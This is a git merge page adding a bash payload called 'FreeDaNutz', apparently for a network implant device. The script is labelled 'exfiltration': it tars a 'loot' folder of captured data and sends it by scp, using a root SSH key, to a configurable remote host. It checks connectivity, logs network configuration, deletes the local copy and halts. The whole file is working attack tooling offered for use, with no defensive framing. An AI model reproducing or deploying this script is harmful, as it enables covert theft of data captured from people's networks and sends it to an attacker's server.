Merge pull request #1 from infoskirmish/infoskirmish-FreeDaNutz
Infoskirmish free da nutzpull/13/head
commit
a40a05a250
|
@ -0,0 +1,204 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: FreeDaNutz
|
||||
|
||||
# Description: This payload will compress the loot folder and then send that file to a remote server via scp
|
||||
|
||||
# Author: infoskirmish.com
|
||||
# Version: 1.0
|
||||
# Category: exfiltration
|
||||
# Target: Any
|
||||
# Net Mode: NAT
|
||||
|
||||
# LEDs
|
||||
# FAIL: This payload will LED FAIL (blink RED) for the following reasons
|
||||
# No USB storage found
|
||||
# Cannot send files to remote host
|
||||
# Cannot ping remote host
|
||||
|
||||
# ATTACK: Setting NAT: Blink Yellow
|
||||
# Compressing: Rapid Cyan
|
||||
# Sending: Rapid Magenta
|
||||
# Cleaning up: Rapid White
|
||||
|
||||
# SUCCESS: LED goes off
|
||||
|
||||
exfilhost="xx.xx.xx.xx" # The hostname or ip address you want to send the data to.
|
||||
exfilhostuser="root" # The username of the account for the above hostname
|
||||
sshport="22" # Port to send data out on
|
||||
exfilfile="backup.tar.gz" # The name of the compressed loot folder
|
||||
identityfile="/root/.ssh/id_rsa" # Path to private identity file on the squirrel
|
||||
remotepath="/root/$exfilfile" # Path to filename (include file name) on the remote machine.
|
||||
exfilfilepath="/mnt/$exfilfile" # Location to temp store compressed loot (this gets sent)
|
||||
lootfolderpath="/mnt/loot" # Path to loot folder
|
||||
payloadlogpath="/mnt/loot/freedanutz" # Path to store payload log file
|
||||
|
||||
|
||||
# The main run function.
|
||||
# Inputs: None
|
||||
# Returns: None
|
||||
# Upon success it will call the finish() function to shutdown.
|
||||
function run() {
|
||||
|
||||
# Create log directory
|
||||
# We store the tarball on /mnt outside the /mnt/loot folder in order to make sure we do not use up all the limited space on the device itself.
|
||||
if [ ! -d $payloadlogpath ]; then
|
||||
|
||||
# If log path does not exisit then we should create it.
|
||||
mkdir -p $payloadlogpath &> /dev/null
|
||||
fi
|
||||
|
||||
# Set networking to NAT mode and wait eight seconds
|
||||
NETMODE NAT
|
||||
sleep 8
|
||||
|
||||
# If we cannot reach the server we want to send our data to then there is no point in going any further.
|
||||
ping $exfilhost -w 3 &> /dev/null
|
||||
pingtest=$?
|
||||
if [ $pingtest -ne 0 ]; then
|
||||
debugdata
|
||||
fail "FATAL ERROR: Cannot reach $exfilhost"
|
||||
fi
|
||||
|
||||
# Let's test to make sure scp keys are set up correclty and we can send files before we send loot.
|
||||
testssh
|
||||
|
||||
# Start blinking LED Cyan very fast to indicate compressing is in progress.
|
||||
LED C VERYFAST
|
||||
|
||||
# Compress the loot folder
|
||||
echo "tar -czf $exfilfilepath $lootfolderpath" >> $payloadlogpath/log.txt
|
||||
tar -czf $exfilfilepath $lootfolderpath &> /dev/null
|
||||
|
||||
# Start blinking LED Magenta very fast to indicate sending is in progress.
|
||||
LED M VERYFAST
|
||||
|
||||
# Send compress file out into the world.
|
||||
echo "scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath" >> $payloadlogpath/log.txt
|
||||
scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath &> /dev/null
|
||||
|
||||
# Clean up
|
||||
finish
|
||||
}
|
||||
|
||||
|
||||
|
||||
# A function to clean up files and safely shutdown
|
||||
# Inputs: None
|
||||
# Returns: None
|
||||
function finish() {
|
||||
|
||||
# Remove the file we have sent out as it is no longer needed and just taking up space.
|
||||
echo "Removing $exfilfilepath" >> $payloadlogpath/log.txt
|
||||
rm $exfilfilepath
|
||||
sync
|
||||
|
||||
# Halt the system; turn off LED
|
||||
LED OFF
|
||||
halt
|
||||
}
|
||||
|
||||
|
||||
|
||||
# A function to test if the payload can send files to the remote host.
|
||||
# Inputs: None
|
||||
# Returns: None
|
||||
# On test fail will abort script.
|
||||
function testssh() {
|
||||
|
||||
# Create test file.
|
||||
touch $exfilfilepath.test
|
||||
scp -P $sshport -C -i $identityfile $exfilfilepath.test $exfilhostuser@$exfilhost:$remotepath &> /dev/null
|
||||
error=$?
|
||||
|
||||
if [ $error -ne 0 ]; then
|
||||
|
||||
# We could not send test file; this is a fatal error.
|
||||
rm $exfilfilepath.test
|
||||
debugdata
|
||||
fail "FATAL ERROR: Could not access and/or login to $exfilhostuser@$exfilhost remove path = $remotepath"
|
||||
|
||||
else
|
||||
# Be nice and try to remove the test file we uploaded.
|
||||
ssh $exfilhostuser@$exfilhost 'rm $remotepath.test'
|
||||
rm $exfilfilepath.test
|
||||
fi
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
# A function to standardize how fatal errors fail.
|
||||
# Inputs: $1:Error message
|
||||
# Returns: None
|
||||
# This will abort the script.
|
||||
function fail() {
|
||||
|
||||
LED FAIL
|
||||
echo $1 >> $payloadlogpath/log.txt
|
||||
sync
|
||||
halt
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
# A function to dump data to aid in trouble shooting problems.
|
||||
# Inputs: None
|
||||
# Returns: None
|
||||
function debugdata() {
|
||||
|
||||
echo "=== DEBUG DATA ===" >> $payloadlogpath/log.txt
|
||||
ifconfig >> $payloadlogpath/log.txt
|
||||
echo "=== Scp Command ===" >> $payloadlogpath/log.txt
|
||||
echo "scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath" >> $payloadlogpath/log.txt
|
||||
echo "=== Tar Command ===" >> $payloadlogpath/log.txt
|
||||
echo "tar -czf $exfilfilepath $lootfolderpath &> /dev/null" >> $payloadlogpath/log.txt
|
||||
echo "=== Public Key Dump ===" >> $payloadlogpath/log.txt
|
||||
cat $identityfile.pub >> $payloadlogpath/log.txt
|
||||
echo "=== Network Config Dump ===" >> $payloadlogpath/log.txt
|
||||
cat /etc/config/network >> $payloadlogpath/log.txt
|
||||
echo "=== Ping $exfilhost Results ===" >> $payloadlogpath/log.txt
|
||||
echo "If there is no data it likely means that $exfilhost is a bad address." >> $payloadlogpath/log.txt
|
||||
ping $exfilhost -w 3 >> $payloadlogpath/log.txt
|
||||
echo "=== lsusb Dump ===" >> $payloadlogpath/log.txt
|
||||
lsusb >> $payloadlogpath/log.txt
|
||||
}
|
||||
|
||||
|
||||
|
||||
# Zero out payload log file.
|
||||
echo "" > $payloadlogpath/log.txt
|
||||
|
||||
# This payload will only run if we have USB storage
|
||||
if [ -d "/mnt/loot" ]; then
|
||||
|
||||
# Check to see if the .ssh folder exists. If it does not exist then create it.
|
||||
if [ ! -d "/root/.ssh" ]; then
|
||||
|
||||
# If it doesn't then we need to create it.
|
||||
echo "Warning: /root/.ssh folder did not exits. We created it." >> $payloadlogpath/log.txt
|
||||
mkdir -p /root/.ssh &> /dev/null
|
||||
|
||||
fi
|
||||
|
||||
# Check if identity file exists. If not create it.
|
||||
if [ ! -f $identityfile ]; then
|
||||
|
||||
# We need to log a warning that since the identify file was not found then this payload likely will fail. This payload will give the user a likely way to fix this problem.
|
||||
echo "Warning: We had to create $identityfile" >> $payloadlogpath/log.txt
|
||||
echo "To complete setup you'll likely need to run this command on the squirrel (make sure when you do your squirrel can access $exfilhost)" >> $payloadlogpath/log.txt
|
||||
echo "cat $identityfile.pub | ssh $exfilhostuser@$exfilhost 'cat >> .ssh/authorized_keys'" >> $payloadlogpath/log.txt
|
||||
ssh-keygen -t rsa -N "" -f $identityfile
|
||||
fi
|
||||
|
||||
LED ATTACK
|
||||
run
|
||||
else
|
||||
|
||||
# USB storage could not be found; log it in ~/payload/switch1/log.txt
|
||||
payloadlogpath="log.txt"
|
||||
debugdata
|
||||
fail "Could not load USB storage. Stopping..."
|
||||
|
||||
fi
|
Loading…
Reference in New Issue